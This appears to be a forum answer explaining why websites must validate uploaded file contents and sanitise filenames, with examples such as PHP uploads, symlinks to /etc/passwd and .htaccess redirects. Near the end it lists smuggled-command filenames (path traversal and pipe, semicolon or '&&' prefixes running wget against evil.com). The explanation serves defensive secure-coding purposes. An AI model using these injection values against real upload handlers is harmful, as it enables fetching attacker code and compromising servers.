Something very similar is a well known security mistake many websites make. If you take uploads from users (say, avatar images for a forum) and don't verify that they are actally valid image files, an attacker can upload a PHP file instead and execute it on your server by requesting it in a web browser from your images directory. It is often not adequate just to check the extension on the filename either, you must validate the contents of the file or run the risk of having a malicious file on your system.
The same is probably generically true of any situation where you accept a file upload and don't verify its contents. The file may be a Solaris executable just waiting for a careless chmod -R 777 /var/www
or a perl script that adds a new user or a malformed PDF file destined to compromise the users of your website or a .htaccess file that redirects users to the attacker's site or even a symlink to /etc/passwd. (Actually, I'm not sure if it's possible to "upload" a symlink but it would certainly be possible to imagine a scenario where an untrusted user could create a symlink on your system.)
Verifying that a file's contents match what they are supposed to be makes it harder for an attacker to get his exploit code on your system. You are right in thinking that not validating is a security mistake.
Once the malicious file is on the system it still requires a second mistake/vulnerability to exploit the file but it puts the attacker one step closer to compromising your system.
Adding to this, you must also sanitise the filename if one is supplied. The .htaccess example earlier is one way an attacker could exploit a filename but filenames like "../index.php" or |/usr/bin/wget evil.com/exploit
or ; wget evil.com/exploit
or && wget evil.com/exploit
could all do nasty things to your system depending on the file handling code.
If we are talking about Apache, it would be difficult to coerce it into overwriting a system binary like ls
but if it's a server you have written yourself that doesn't drop privileges and is running as root then it would have the permission needed to overwrite system binaries and would just be waiting for the right file path.